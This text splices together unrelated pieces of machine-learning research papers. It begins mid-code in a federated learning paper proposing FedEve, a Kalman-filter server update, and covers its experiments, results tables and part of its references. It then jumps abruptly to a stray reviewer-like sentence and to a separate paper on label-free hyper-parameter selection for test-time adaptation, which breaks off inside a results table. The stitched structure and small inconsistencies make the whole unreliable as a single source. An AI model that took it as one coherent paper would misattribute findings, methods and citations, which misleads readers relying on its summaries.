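    var_Q = np.sum((M - delta) ** 2) / (m * d)                # period-drift variance
    var_R = sum(np.sum((dk - delta) ** 2)
                for dk in client_deltas) / (m ** 2 * d)       # client-drift variance
    var_pred = var + var_Q                                    # (12b)
    K = var_pred / (var_pred + var_R)                         # (12c) Kalman gain
    M = M + K * (delta - M)                                   # (12d) fuse the two
    w = w - lr_g * M                                          # (12e) global update
    var = (1.0 - K) * var_pred                                # (12f) fused variance
    return w, M, var
```

All quantities live on the server, so the communication cost matches FedAvg, in line with the discussion above.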
The fundamental principle of FedEve is to calculate the Kalman gain $K$, which determines the relative weight of the prediction and the observation when they are combined. The value of $K$ is calculated from the ratio between the variance of the prediction (driven by $\sigma_{Q_t}^2$) and the variance of the observation, $\sigma_{R_t}^2$. This coefficient adjusts the update direction of the model. A small $K$ means that the observation is close to the prediction, hence the update direction will also stay close to the prediction; a large $K$ means that the observation deviates significantly from the prediction, hence the update direction will move away from the prediction and closer to the observation. This allows the algorithm to adapt to different scenarios in which the observations may deviate more or less from the predictions. 4 EXPERIMENTS 4.1 SETUP Datasets and models. We evaluate FedEve on three computer vision (CV) and recommender system (RS) datasets under realistic cross-device FL settings. For the CV tasks, we use FEMNIST\(^2\) (Caldas et al., 2018), consisting of 671,585 training examples and 77,483 test samples of 62 different classes, including 10 digits, 26 lowercase, and 26 uppercase characters in 28x28-pixel images handwritten by 3,400 users. We also use CIFAR-10/100\(^3\) (Krizhevsky, 2009), consisting of 50,000 training examples and 10,000 test samples of 10/100 different classes with 32x32 pixels. For the FEMNIST dataset, we use the lightweight LeNet-5 model (LeCun et al., 1998), and for the CIFAR-10/100 datasets we use ResNet-18 (replacing batch norm with group norm (Hsieh et al., 2020; Reddi et al., 2020)). For the RS task, we use MovieLens 1M\(^4\) (Harper and Konstan, 2015), including 1,000,209 ratings by 6,040 unidentifiable users on 3,706 movies. It is a click-through rate (CTR) task, and we use the popular DIN model (Zhou et al., 2018). For performance evaluation, we follow a widely used leave-one-out protocol (Muhammad et al., 2020): for each user, we hold out their latest interaction as the test set and use the remaining data as the training set; we binarize the user feedback by converting all ratings to 1, and sample negative instances at 4 times the number of positive ones for training and 99 times for testing. Federated learning settings. It is important to note that the FEMNIST and MovieLens 1M datasets have a "natural" non-iid distribution, which means that the data is split by user id. For example, in FEMNIST, images are handwritten by different users, and in MovieLens 1M, movies are rated by different users. Furthermore, we use the Dirichlet distribution to simulate the label-distribution-skew setting for FEMNIST, as described in Hsu et al. (2019). This distribution allows us to control the degree of heterogeneity by adjusting the hyperparameter $\alpha$ (the smaller, the more non-iid).
This allows us to test the robustness of the algorithm under different levels of heterogeneity, which is a common scenario in real-world FL settings. For the FL training, we set a total of $T = 1500$ communication rounds for the CV tasks and sample 10 clients per round with the SGD optimizer; for the RS task, we set a total of $T = 1000$ communication rounds and sample 20 clients per round with the Adam optimizer (Kingma and Ba, 2014). In all datasets, each client trains for $E = 1$ epoch in the local update with a learning rate of $\eta_l = 0.01$. In our proposed FedEve, we set the global learning rate $\eta_g = 1$ for all experiments. \(^2\)https://github.com/TalwalkarLab/leaf/tree/master/data/femnist \(^3\)https://www.cs.toronto.edu/~kriz/cifar.html \(^4\)https://grouplens.org/datasets/movielens/ Baselines. To evaluate the performance of FedEve, we compare it with several state-of-the-art FL methods: 1) the vanilla FL method FedAvg (McMahan et al., 2017), which is widely used in FL; 2) a client-side FL method, FedProx (Li et al., 2020b), which improves local training by adding a proximal term to the local update; 3) a server-side FL method, FedAvgM (Hsu et al., 2019), which adapts momentum to FL optimization; and 4) a server-side FL method, FedOpt (Reddi et al., 2020), which introduces adaptive optimization methods to FL. See more experimental details in Appendix B. 4.2 Analysis Figure 3: Visualization of period drift and its impact on performance. (a) Visualization of period drift. The color of the scatter points represents different classes, and the size denotes the number of samples of a given class on a particular client. When data is more non-iid (smaller $\alpha$), the heterogeneity of sampled data distributions becomes more pronounced both within a given communication round (client drift) and between different communication rounds (period drift). (b) Visualization of its impact on performance. In cross-device FL with rather non-iid data, period drift has a greater effect than client drift. See Appendix B.2 for setting details. Visualizing the period drift and its impact. Figure 3(a) visualizes the data distributions of the sampled clients. Client drift arises due to the shift in label distribution among sampled clients within a single round, while period drift results from the shift in the data distribution of participating clients across different rounds. The scatter points' size and distribution grow more diverse both within and across communication rounds as the value of $\alpha$ decreases (indicating increasing non-iid-ness). The implications of these drifts for the global model's convergence are presented in Figure 3(b). Using the vanilla FedAvg algorithm for illustration, we experimented with four settings: 1) FedAvg with iid data; 2) FedAvg experiencing only period drift; 3) FedAvg subject to only client drift; and 4) FedAvg impacted by both drifts (see Appendix B.2 for detailed settings). As heterogeneity intensifies, the effects of both drifts become evident. Specifically, in a highly non-iid environment ($\alpha = 0.01$), FedAvg affected only by client drift yields results akin to the iid setting.
In contrast, FedAvg influenced solely by period drift significantly disrupts the stability and convergence of the FL process. The combination of both drifts results in the poorest performance, underlining that in cross-device FL, period drift poses a more considerable challenge to model convergence than client drift. The performance of FedEve. We evaluate our algorithm on real-world datasets and compare it with the relevant state-of-the-art methods in Tables 1 and 2. We conducted simulations on three datasets: FEMNIST, CIFAR-100, and MovieLens. The FEMNIST and MovieLens datasets have a naturally arising client partitioning found in real-world FL scenarios, making them highly representative. For the FEMNIST and CIFAR-100 datasets, each dataset includes three non-iid settings, established through the Dirichlet-distribution partition method (Hsu et al., 2019). Generally, the results show that our proposed algorithm, FedEve, consistently outperforms the baselines, and the performance gains are more dominant in more non-iid settings ($\alpha = 0.01$). We also conduct experiments with different local epochs ($E$); please refer to Appendix B.3 for the setting details. Moreover, FedEve has a larger lead in the RS experiments, indicating its potential in real-world industrial applications. Our method can better utilize server-side adaptation through the Bayesian filter of the predict-observe framework. Besides, it is important to note that our method does not introduce additional hyperparameters, while the baselines have multiple hyperparameters to tune, which makes FedEve more flexible and advantageous in real-world practice.

Table 1: Results on FEMNIST and CIFAR-100. The best method is highlighted in bold fonts.

| Methods / Non-IID | FEMNIST natural | FEMNIST α = 1 | FEMNIST α = 0.1 | FEMNIST α = 0.01 | CIFAR-100 α = 1 | CIFAR-100 α = 0.1 | CIFAR-100 α = 0.01 |
|---|---|---|---|---|---|---|---|
| FEDAVG | 82.57 ± 0.18 | 83.60 ± 0.11 | 82.02 ± 0.23 | 73.23 ± 1.36 | 47.04 ± 0.21 | 43.93 ± 0.36 | 30.11 ± 0.53 |
| FEDAVGM | 82.53 ± 0.43 | 83.67 ± 0.10 | 82.30 ± 0.49 | 74.96 ± 2.34 | 48.22 ± 0.19 | 44.74 ± 0.40 | 31.59 ± 0.98 |
| FEDPROX | 82.34 ± 0.17 | 83.58 ± 0.11 | 82.04 ± 0.27 | 74.16 ± 1.19 | 46.86 ± 0.38 | 43.74 ± 0.27 | 30.10 ± 0.55 |
| SCAFFOLD | 81.66 ± 0.28 | 83.06 ± 0.14 | 79.82 ± 0.42 | 5.13 ± 0.00 | 47.26 ± 1.49 | 36.36 ± 4.98 | 1.00 ± 0.00 |
| FEDOPT | 5.13 ± 0.00 | 81.86 ± 0.38 | 78.16 ± 0.39 | 5.13 ± 0.00 | 47.26 ± 1.49 | 45.43 ± 1.18 | 32.17 ± 1.38 |
| **FEDEVE** | **82.68 ± 0.19** | **83.81 ± 0.09** | **82.69 ± 0.31** | **75.99 ± 1.61** | **48.38 ± 0.24** | **45.68 ± 0.16** | **32.68 ± 0.62** |

Table 2: Results on MovieLens-1M. The best method is highlighted in bold fonts.

| Method | AUC | HR@5 | HR@10 | NDCG@5 | NDCG@10 |
|---|---|---|---|---|---|
| FEDAVG | 0.7633 ± 0.0065 | 0.2774 ± 0.0100 | 0.4294 ± 0.0120 | 0.1835 ± 0.0058 | 0.2324 ± 0.0064 |
| FEDAVGM | 0.7555 ± 0.0128 | 0.2705 ± 0.0384 | 0.4290 ± 0.0196 | 0.1771 ± 0.0319 | 0.2280 ± 0.0257 |
| FEDPROX | 0.7819 ± 0.0033 | 0.2700 ± 0.0129 | 0.4279 ± 0.0083 | 0.1803 ± 0.0078 | 0.2310 ± 0.0065 |
| FEDOPT | 0.7751 ± 0.0085 | 0.2868 ± 0.0055 | 0.4392 ± 0.0101 | 0.1886 ± 0.0044 | 0.2377 ± 0.0040 |
| **FEDEVE** | **0.7967 ± 0.0016** | **0.2916 ± 0.0077** | **0.4460 ± 0.0088** | **0.1924 ± 0.0039** | **0.2407 ± 0.0037** |

Analysis of Kalman Gain in FedEve.
We conducted an in-depth analysis of the Kalman gain $K$ of FedEve under various experimental settings, incorporating four levels of data heterogeneity and various numbers of local epochs, as shown in Figure 4. We observed that as data heterogeneity increases (i.e., as the value of $\alpha$ decreases), the Kalman gain $K$ progressively enlarges. With the rise of data heterogeneity, period drift starts to play a more dominant role. In this context, the primary role of the Kalman gain $K$ is to adjust the weights between the global prediction and the local updates, as depicted by Equations (12c) and (12d). Further, according to Equation (12d), with a larger $K$ the model update tends to trust local updates more, stabilizing the optimization process. For varied counts of local updates, the relative change in the Kalman gain $K$ is marginal. This is primarily because, in cross-device FL, client drift is not a pivotal or dominant factor, which aligns with our prior analysis in Figure 3. 5 CONCLUSION In this work, we explored the impact of client drift and period drift on the performance of cross-device FL, discovering that period drift can be particularly harmful as data heterogeneity increases. To address this challenge, we introduced a novel predict-observe framework and a method, FedEve, that views these drifts as the noise associated with prediction and observation. By integrating these two sources in a principled way, we provide a better estimation of model update steps, reducing variance and improving the stability and convergence speed of FL. Our theoretical and empirical evaluations demonstrated that FedEve significantly outperforms alternative methods, shedding light on future directions for improving efficiency in FL. REFERENCES Barak Battash and Ofir Lindenbaum. Revisiting the noise model of stochastic gradient descent. *arXiv preprint arXiv:2303.02749*, 2023. Sebastian Caldas, Sai Meher Karthik Duddu, Peter Wu, Tian Li, Jakub Konečný, H Brendan McMahan, Virginia Smith, and Ameet Talwalkar. Leaf: A benchmark for federated settings. *arXiv preprint arXiv:1812.01097*, 2018. Hong-You Chen and Wei-Lun Chao. On bridging generic and personalized federated learning for image classification. In *International Conference on Learning Representations*, 2021. Yae Jee Cho, Jianyu Wang, and Gauri Joshi. Towards understanding biased client selection in federated learning. In *International Conference on Artificial Intelligence and Statistics*, pages 10351–10375. PMLR, 2022. Yann Fraboni, Richard Vidal, Laëtitia Kameni, and Marco Lorenzi. A general theory for client sampling in federated learning. In *Trustworthy Federated Learning: First International Workshop, FL 2022. Held in Conjunction with IJCAI 2022, Vienna, Austria, July 23, 2022, Revised Selected Papers*, pages 46–58. Springer, 2023. Yongxin Guo, Tao Lin, and Xiaoying Tang. Towards federated learning on time-evolving heterogeneous data. *arXiv preprint arXiv:2112.13246*, 2021. F Maxwell Harper and Joseph A Konstan. The movielens datasets: History and context. *ACM Transactions on Interactive Intelligent Systems (TiiS)*, 5(4):1–19, 2015. Kevin Hsieh, Amar Phanishayee, Onur Mutlu, and Phillip Gibbons. The non-iid data quagmire of decentralized machine learning. In *International Conference on Machine Learning*, pages 4387–4398. PMLR, 2020. Tzu-Ming Harry Hsu, Hang Qi, and Matthew Brown. Measuring the effects of non-identical data distribution for federated visual classification. *arXiv preprint arXiv:1909.06335*, 2019.
Peter Kairouz, H Brendan McMahan, Brendan Avent, Aurélien Bellet, Mehdi Bennis, Arjun Nitin Bhagoji, Kallista Bonawitz, Zachary Charles, Graham Cormode, Rachel Cummings, et al. Advances and open problems in federated learning. *Foundations and Trends® in Machine Learning*, 14(1–2):1–210, 2021. Sai Praneeth Karimireddy, Satyen Kale, Mehryar Mohri, Sashank J. Reddi, Sebastian U. Stich, and Ananda Theertha Suresh. SCAFFOLD: Stochastic Controlled Averaging for Federated Learning. *arXiv:1910.06378 [cs, math, stat]*, 2021. Diederik P Kingma and Jimmy Ba. Adam: A method for stochastic optimization. *arXiv preprint arXiv:1412.6980*, 2014. Hendrik Anthony Kramers. Brownian motion in a field of force and the diffusion model of chemical reactions. *Physica*, 7(4):284–304, 1940. Yann LeCun, Léon Bottou, Yoshua Bengio, and Patrick Haffner. Gradient-based learning applied to document recognition. *Proceedings of the IEEE*, 86(11):2278–2324, 1998. Tian Li, Anit Kumar Sahu, Ameet Talwalkar, and Virginia Smith. Federated learning: Challenges, methods, and future directions. *IEEE Signal Processing Magazine*, 37(3):50–60, 2020a. Tian Li, Anit Kumar Sahu, Manzil Zaheer, Maziar Sanjabi, Ameet Talwalkar, and Virginia Smith. Federated Optimization in Heterogeneous Networks. *arXiv:1812.06127 [cs, stat]*, 2020b. Tao Lin, Sebastian U Stich, Kumar Kshitij Patel, and Martin Jaggi. Don’t use large mini-batches, use local sgd. *arXiv preprint arXiv:1808.07217*, 2018. Tao Lin, Lingjing Kong, Sebastian U Stich, and Martin Jaggi. Ensemble distillation for robust model fusion in federated learning. *Advances in Neural Information Processing Systems*, 33:2351–2363, 2020.
This paper only investigates offline model selection, which may offer limited insight into the challenge of online model selection for TTA methods, particularly in light of the batch dependency analyzed in [3].
Realistic Evaluation of Test-Time Adaptation: Surrogate-Based Model Selection Strategies Anonymous authors Paper under double-blind review Abstract Test-Time Adaptation (TTA) has recently emerged as a promising strategy for tackling the problem of machine learning model robustness under distribution shifts. This setting constitutes a significant challenge, as the model has to adapt to the new environment without any labeled data. Contemporary methods, such as deep neural networks, typically rely on a cumbersome hyper-parameter tuning procedure that leverages target labels; yet what happens when those labels are unavailable, as in the test-time adaptation scenario? In this work, we tackle this very problem of hyper-parameter selection by evaluating several surrogate metrics that require no access to the test labels. The main goal of this work is to provide a realistic evaluation of TTA methods under different domain shifts, as well as an evaluation of different strategies for model selection in TTA. Our main findings are: i) the accuracy of model selection strategies varies strongly across datasets and adaptation methods; ii) out of the 6 evaluated approaches, only the AdaContrast method allows for surrogate-based model selection that matches oracle selection performance; and iii) using a tiny set of labeled test samples beats all competing selection strategies. Our findings underscore the need for future research in the field to conduct rigorous evaluations with explicitly stated model selection strategies, to give more realistic approximations of the performance of test-time adaptation methods. 1 Introduction Machine learning models typically assume that training and testing data originate from the same distribution. However, in real-world applications, one observes a distribution shift between the training (source) and testing (target) data domains. That, in turn, hurts the model's performance (sometimes drastically) at test time. Unsupervised domain adaptation methods explore adapting a model trained on the source domain to the target one, having access only to unlabeled target data. Test-time adaptation (TTA) extends this scenario to the online setting, where the model needs to adapt on the fly. Recently, various approaches for test-time adaptation have been developed. Some popular strategies involve entropy minimization on test data using pseudo-labeling (Wang et al., 2021). To increase accuracy, extensive data augmentations can be used (Wang et al., 2022), or unreliable pseudo-labels can be filtered out (Niu et al., 2023). Yet, without any supervision at test time, errors in pseudo-labels are unavoidable. To avoid error accumulation, model restart strategies based on heuristics are often employed (Niu et al., 2023; Wang et al., 2022). Despite all of those challenges, existing test-time adaptation methods seem to work well, often significantly improving over the naive strategy of using the source model without adaptation. However, the reliability of such methods in practical applications remains dubious. Press et al. (2023) showed that in extremely long scenarios all existing TTA methods result in degraded performance compared to the source model. Similarly, Zhao et al. (2023) demonstrated that existing TTA methods are very vulnerable to the choice of hyper-parameters. Interestingly, there is no consensus in the community on how to select the hyper-parameters for a given method. This is especially crucial for TTA, where there is no access to labeled data.
The recent benchmark of Zhao et al. (2023) compared the accuracies of various TTA methods assuming an oracle selection strategy, i.e., with access to the test data labels. This provides a fair comparison between existing methods, but it can only give an overly optimistic measure of their potential performance. Furthermore, some methods that score best using oracle selection may still fall short under a realistic model selection strategy (e.g., due to their sensitivity to hyper-parameter choices). To this end, given an unlabeled dataset and a set of candidate models, we want to find an answer to the following research question: **how can we select the most accurate model?** We propose and evaluate different surrogate measures that do not use test labels for model selection in TTA. Our results give a realistic estimate of the existing TTA methods' performance. A fair comparison with the oracle-based results can help with real-life TTA applications. Our contributions can be summarized as follows: - To the best of our knowledge, we are the first to provide an analysis of TTA methods' performance under different model selection strategies. To this end, we identify intuitive and effective surrogate metrics of model performance and benchmark six state-of-the-art TTA methods across four different datasets using six different model selection strategies. - Our benchmark reveals that the accuracy of model selection strategies varies strongly across datasets and adaptation methods. In particular, we show that the ranking of existing TTA methods changes across selection strategies (i.e., the best method under the oracle selection strategy is never the best when using surrogate strategies). Additionally, we show that among the evaluated TTA methods, only AdaContrast allows for consistent model selection that matches oracle selection without access to the target labels. - With our detailed analysis, we identify the shortcomings of each of the analyzed surrogate metrics. We show that model selection is a very challenging problem, but that access to a small labeled set greatly helps to improve the selection quality. Our work emphasizes the importance of future research in this field carrying out thorough assessments, using clearly defined model selection strategies as benchmarks. We also create a testbed for a more rigorous comparison of existing TTA approaches. ## 2 RELATED WORK ### Model selection in TTA. Usually, no model selection strategy is provided (Niu et al., 2022; Gong et al., 2022; Niu et al., 2023; Wang et al., 2021; Döbler et al., 2023; Wang et al., 2022; Chen et al., 2022; Yuan et al., 2023), and only the final hyper-parameters are listed. This motivates us to perform a rigorous evaluation of TTA methods under different model selection strategies. A recent study shows that under an oracle model selection strategy (with access to test labels), none of the existing methods is capable of addressing all common types of distribution shifts (Zhao et al., 2023). There is only one non-oracle-based model selection strategy reported in the literature: in Rusak et al. (2022), the authors use cross-dataset validation to perform hyper-parameter selection. In particular, they used the optimal parameters selected on the ImageNet-C dataset for testing on different benchmarks. We hypothesize that such a strategy can only work well if there is a similarity between the datasets used.
An analogous strategy for parameter selection was used in Boudiaf et al. (2022). The authors found that existing methods lack transferability, whereas their proposed parameter-free method (LAME) is robust to hyper-parameter changes. ### Unsupervised model selection. Gulrajani & Lopez-Paz (2021) tested different strategies for unsupervised model selection in domain adaptation: i) source dataset accuracy, ii) cross-dataset accuracy, and iii) limited access to the target labels. They showed that under such a fair comparison, no domain adaptation method works better than standard empirical risk minimization training. This study was recently extended to partial domain adaptation by additionally incorporating strategies based on surrogate (unsupervised) measures, such as entropy or model consistency on test data (Salvador et al., 2022). The unsupervised model selection problem was also studied in time-series anomaly detection (Goswami et al., 2023): based on different surrogate metrics, the authors proposed a robust rank-aggregation method that was shown to obtain competitive results. We are inspired by those studies and examine various strategies for test-time adaptation under different domain shifts, to i) obtain a realistic approximation of current methods' performance, and ii) validate the applicability of surrogate measures for hyper-parameter and model selection. One interesting aspect of test-time adaptation is that the sequence length can have an impact on the optimal model parameters, and this is something we also investigate by running test-time adaptation on ImageNet-C with different sequence lengths. 3 TEST-TIME ADAPTATION PROBLEM 3.1 PROBLEM FORMULATION Given a source model $f_{\theta_S}$, trained on labeled data from the source domain $\mathcal{D}_S = \{\mathcal{X}_S, \mathcal{Y}_S\}$, the objective is to adapt it to the test data $\mathcal{D}_T = \{\mathcal{X}_T, \mathcal{Y}_T\}$. In the source data $\mathcal{D}_S$, sample-label pairs $(x_i \in \mathcal{X}_S, y_i \in \mathcal{Y}_S)$ are distributed according to the probability distribution $P_S(x, y)$. The test samples $x_i \in \mathcal{X}_T$ are modeled by a different distribution, $P_T(x, y) \neq P_S(x, y)$. At each testing time step $t$, the TTA process aims to adapt the model $f_{\theta_S}$ to better align with the distribution $P_T$. Importantly, unlabeled data samples $x_t^i \sim P_T$ are the only information available regarding the unseen distribution $P_T$. Model selection, that is, selecting both (i) an algorithm and (ii) its associated hyper-parameter(s), is a crucial part of all machine learning pipelines. In a standard supervised learning setting, a validation set can be used to estimate the model's accuracy. However, in TTA such an approach is not possible, as there is no access to labeled target samples. Below, we discuss several approaches for model selection in TTA which we use in this work. 3.2 MODEL SELECTION STRATEGIES IN TTA Source accuracy (S-ACC). The simplest strategy uses a small validation set from the source domain to estimate the model's performance in the target domain, as done, e.g., in domain adaptation (Ganin & Lempitsky, 2015). This strategy assumes that the training and test examples follow similar distributions. Interestingly, however, Miller et al. (2021) show that there is a linear correlation between accuracy on i.i.d. and o.o.d. data, which may favor such a strategy. Some TTA methods assume there is no access to the source data, e.g., because of privacy concerns (Liang et al., 2020).
In such applications, this strategy may not be valid. Cross-validation accuracy (CROSS-ACC). Another reasonable approach is to select hyper-parameters on some other dataset. This is a potentially valid strategy, since plenty of benchmarks already exist for TTA which could be utilized for this purpose. Here, we follow Rusak et al. (2022) and perform hyper-parameter selection on the ImageNet-C dataset, which they showed to work well. In our work, we additionally test whether the parameters tuned on one dataset also work well when we test on the same dataset but i) with an increased sequence length, and ii) with a changed temporal correlation between classes. Entropy (ENT). Minimizing the Shannon entropy $H(\hat{y}) = -\sum_c p(\hat{y}_c) \log p(\hat{y}_c)$, where $\hat{y}_c$ is the probability prediction of class $c$, of predictions for target samples $\hat{y} = f_\theta(x_t^i)$ was introduced for test-time adaptation in Wang et al. (2021) because i) it is related to error, as more confident predictions tend to be more correct, and ii) entropy is related to shifts due to corruption, as more corruption results in higher entropy. This strategy was adopted by several works, showing its efficiency (Niu et al., 2023; Wang et al., 2021; Niu et al., 2022). However, as shown by Boudiaf et al. (2022), in some scenarios entropy does not correlate with accuracy. Nevertheless, we decided to also include entropy as a surrogate measure because of its simplicity and common usage. Model consistency (CON). Consistency regularization is an important component of many self-supervised learning algorithms (Sohn et al., 2020). It enforces the model $f_\theta$ to have similar predictions when fed perturbed versions $\tilde{x}_i$ of the same image $x_i$: $f_\theta(x_i) \simeq f_\theta(\tilde{x}_i)$. It was also used to drive the training of the model during the TTA phase (Nguyen et al., 2023). As the choice of perturbations, we use the augmentation pipeline introduced in CoTTA (Wang et al., 2022), as it is quite commonly used in TTA and was shown to work well. The augmentations include color jittering, Gaussian noise, blur, etc.; further information can be found in the Appendix (sec. A). Using test labels. We also incorporate the ORACLE model selection strategy to measure an upper bound for the evaluated methods and to see how closely the surrogate measures approach it. Additionally, we use one more model selection strategy, 100-RND, which assumes limited access to the test data: following Salvador et al. (2022), we use labels from 100 randomly selected test images for model selection. Table 1 summarizes our experimental setup.

Table 1: Summary of the experimental setup considered in this work.

| TTA Methods | TENT, SAR, LAME, EATA, RMT, AdaContrast |
| Model Selection Strategies | S-ACC, ENT, CROSS-ACC, CON, 100-RND, ORACLE |
| Tuned parameters | learning rate, momentum, and method-specific parameters (SAR, EATA) |
| Experimental protocol | 4 datasets, varying levels of temporal correlation and adaptation sequence length |
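To make the label-free surrogates of Section 3.2 concrete, the following PyTorch-style sketch computes the average prediction entropy (ENT) and augmentation consistency (CON) over a test stream. The `augment` callable stands in for the CoTTA-style perturbation pipeline, and the loader is assumed to yield unlabeled image batches; both are illustrative assumptions:

```python
import torch
import torch.nn.functional as F

@torch.no_grad()
def surrogate_scores(model, loader, augment):
    """Average entropy (ENT) and prediction consistency (CON) on unlabeled
    test data; target labels are never touched."""
    ent_sum, con_sum, n = 0.0, 0.0, 0
    for x in loader:
        p = F.softmax(model(x), dim=1)
        ent_sum += (-(p * p.clamp_min(1e-8).log()).sum(dim=1)).sum().item()
        p_aug = F.softmax(model(augment(x)), dim=1)
        con_sum += (p.argmax(dim=1) == p_aug.argmax(dim=1)).float().sum().item()
        n += x.size(0)
    return ent_sum / n, con_sum / n  # lower ENT is better, higher CON is better
```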
4 EXPERIMENTAL SETUP 4.1 DATASETS For experiments, we utilize two widely used datasets for TTA evaluation with artificial image corruptions: CIFAR100-C and ImageNet-C (Hendrycks & Dietterich, 2019). Moreover, we use two datasets consisting of images without corruptions, but portraying objects in different domains: DomainNet-126 (Saito et al., 2019) and ImageNet-R (Hendrycks et al., 2021). CIFAR100-C and ImageNet-C are created by applying 15 different corruption types with 5 severity levels to the images from the test split of the clean CIFAR100 (Krizhevsky, 2009) and ImageNet (Deng et al., 2009) datasets, creating multiple domains. Following state-of-the-art TTA works (Wang et al., 2022; Niu et al., 2022; Döbler et al., 2023), for testing TTA methods we utilize the standard sequence of corruption types at the 5th severity level sequentially, without mixing the domains. The source models are trained on the clean CIFAR100 or ImageNet dataset. DomainNet-126 is a subset of the DomainNet dataset (Peng et al., 2019) cleaned of noisy labels. It consists of images of 126 different objects from 4 different domains: real-world photos, clipart images, sketches, and paintings. The source model is trained on the actual photos and adapted during test time to the images from the sequence of the remaining domains. ImageNet-R is composed of various renditions of 200 objects from the original ImageNet dataset, spanning domains such as art, cartoons, graffiti, embroidery, origami, tattoos, and more. This dataset comprises a total of 30,000 images. The source data come from the original ImageNet, and TTA is tested on all of the rendition types at once. Additionally, inspired by Gong et al. (2022), we test the influence of a temporally correlated class distribution within the CIFAR100-C test sequence on the performance of different TTA methods. For this purpose, we utilize the Dirichlet distribution with different concentration parameters $\delta$ to sample the class exemplars. Moreover, we test the scenario of long TTA operation by utilizing the ImageNet-C testing sequence ten times without any model reset in between the sequences. 4.2 METHODS In our testbed, we include six different methods, which differ in the optimized objective, the number of hyper-parameters, the fine-tuned layers, etc. TENT (Wang et al., 2021) is a popular TTA method that minimizes the entropy of the predictions while optimizing only the batch-norm parameters of the model (a simplified sketch of such an adaptation step is given below). SAR (Niu et al., 2023) additionally applies filtering to remove noisy samples, uses a sharpness-aware optimizer that encourages flat minima, and finally applies a model reset scheme. EATA (Niu et al., 2022) uses a filtering scheme that removes not only noisy samples but also redundant ones, and additionally introduces a Fisher regularizer to constrain important model parameters from drastic changes (this requires one-time access to the source data). In contrast to the previous methods, which use an entropy minimization objective and fine-tune only batch normalization layers, AdaContrast (Chen et al., 2022) incorporates a self-supervised contrastive objective with consistency regularization and fine-tunes all weights of the model. The RMT method (Döbler et al., 2023) also uses a contrastive objective, but additionally uses it to align the learned feature space with that of the source model, combined with a symmetric cross-entropy loss and weight averaging. Hyper-parameter sensitivity. A potential limitation of the above methods is that they require per-task parameter tuning, which can be a serious limitation in test-time adaptation without access to test labels.
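The sketch below illustrates a minimal TENT-style adaptation step; it is a simplification for illustration, not the reference implementation. Everything except the batch-norm affine parameters is frozen, and the learning rate handed to the optimizer is exactly the kind of hyper-parameter whose label-free selection this work studies:

```python
import torch
import torch.nn as nn
import torch.nn.functional as F

def configure_tent(model, lr=1e-3, momentum=0.9):
    """Freeze the model except batch-norm affine parameters (TENT-style)."""
    model.requires_grad_(False)
    params = []
    for m in model.modules():
        if isinstance(m, nn.BatchNorm2d) and m.weight is not None:
            m.requires_grad_(True)          # adapt only gamma and beta
            params += [m.weight, m.bias]
    return torch.optim.SGD(params, lr=lr, momentum=momentum)

def tent_step(model, optimizer, x):
    """Adapt on one unlabeled test batch by minimizing prediction entropy."""
    probs = F.softmax(model(x), dim=1)
    loss = -(probs * probs.clamp_min(1e-8).log()).sum(dim=1).mean()
    optimizer.zero_grad()
    loss.backward()
    optimizer.step()
    return probs.detach()                   # predictions for the current batch
```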
In LAME, Boudiaf et al. (2022) analyzed the hyper-parameter sensitivity of existing TTA methods and proposed a parameter-free approach that modifies only the model's output (not its parameters), solving the objective with a concave-convex procedure (i.e., without the need to tune a learning rate). As a result, we run only one test per dataset with the LAME method and do not need to perform hyper-parameter selection.

Access to the source data. The RMT method additionally assumes a replay mechanism for the source data, which may give it an advantage over the other methods, which were developed with the motivation of not using a memory buffer during training. Thus, we experiment with a source-free variant of RMT, denoted RMT-SF, which was shown in the original paper to also work well.

4.3 EXPERIMENTAL SETUP

Hyper-parameters. For each of the algorithms, we perform a search over the two most important hyper-parameters, that is, the learning rate (4 configurations) and momentum (using a value of 0.9 or not using momentum at all), similar to Boudiaf et al. (2022). This gives 8 configurations per model. For SAR and EATA, we additionally search over the method-specific parameters using random search, which gives 8 additional configurations for those methods. Details about the hyper-parameters are given in the Appendix (Sec. A). Each experiment is repeated 3 times. In total, we performed 1500 adaptation sessions. All models are compared against the SOURCE model, which performs no adaptation at all.

Implementation details. For CIFAR100-to-CIFAR100-C, following the RobustBench benchmark (Croce et al., 2021), the ResNeXt-29 (Xie et al., 2017) architecture is used. For the remaining datasets, a source pre-trained ResNet-50 is used, similar to Döbler et al. (2023). As the optimizer, we use SGD for all the methods. Regarding the batch size, we are most interested in the online setting, i.e., a batch size of one. However, some methods do not work well in the single-image adaptation setting. As such, we use a batch size of ten, which was shown in other works to still perform well (Niu et al., 2023). A batch size of ten is also commonly used in continual learning for online scenarios (Mai et al., 2022).

Test-time augmentations. Some of the TTA methods use data augmentation at test time (Wang et al., 2022; Sun et al., 2020), including AdaContrast and RMT considered in this paper. These augmentations include some of those that were used to generate the ImageNet-C and CIFAR100-C benchmarks (details in the Appendix). We treat these augmentations as part of the method, as they are needed to compute the consistency loss; however, it is important to note that they can give these methods an advantage on the first two benchmarks. In general, knowledge of a distortion type that can occur at test time is beneficial and could be exploited when designing a TTA method.

5 RESULTS

In Table 2, we show the results of hyper-parameter selection under different selection strategies. In Fig. 1, we plot correlations between surrogate metrics and target accuracy. Further, we increase the difficulty of the testing conditions by increasing the length of the testing scenarios in Table 4 and by varying the class correlation level of the test samples in Fig. 3. Finally, in Table 3 we extend the evaluation to model selection across different TTA methods, to show how surrogate metrics perform when selecting among methods.

Varying gap between surrogate-based hyper-parameter selection and oracle selection.
The gap varies between methods. For example, for the EATA method, using the source selection strategy, the gap ranges from 0.66% on CIFAR100-C to 7.11% on ImageNet-C (a relative gap of 24.62%). On the contrary, for the AdaContrast method, using source accuracy for model selection allowed it to match the oracle selection strategy on all of the datasets.

Table 2: Final accuracy of the evaluated test-time adaptation methods under different model selection strategies. **Green** color marks the best surrogate strategy for each of the methods, and **red** color marks the worst one. The last section aggregates the results over the 4 datasets; here we rank each of the TTA methods within each of the selection strategies. **Bold** marks the best method, and underline marks the second best.

| Dataset | Method | S-ACC | CROSS-ACC | ENT | CON | 100-RND | MEDIAN | ORACLE |
|---------------|-----------------|---------|-----------|--------|--------|---------|--------|--------|
| CIFAR100-C | SOURCE | | | | | | | |
| | TENT | 59.93±0.15 | 59.56±0.2 | 5.32±0.05 | 59.56±0.20 | 59.17±0.41 | 54.46±0.51 | 60.16±0.14 |
| | EATA | 61.78±0.40 | 61.86±0.47 | 21.01±20.12 | 58.60±4.71 | 61.95±0.57 | 60.51±0.36 | 62.44±0.35 |
| | SAR | 59.47±0.11 | 45.65±5.83 | 11.68±5.92 | 48.75±0.21 | 59.26±0.2 | 57.03±0.27 | 60.01±0.12 |
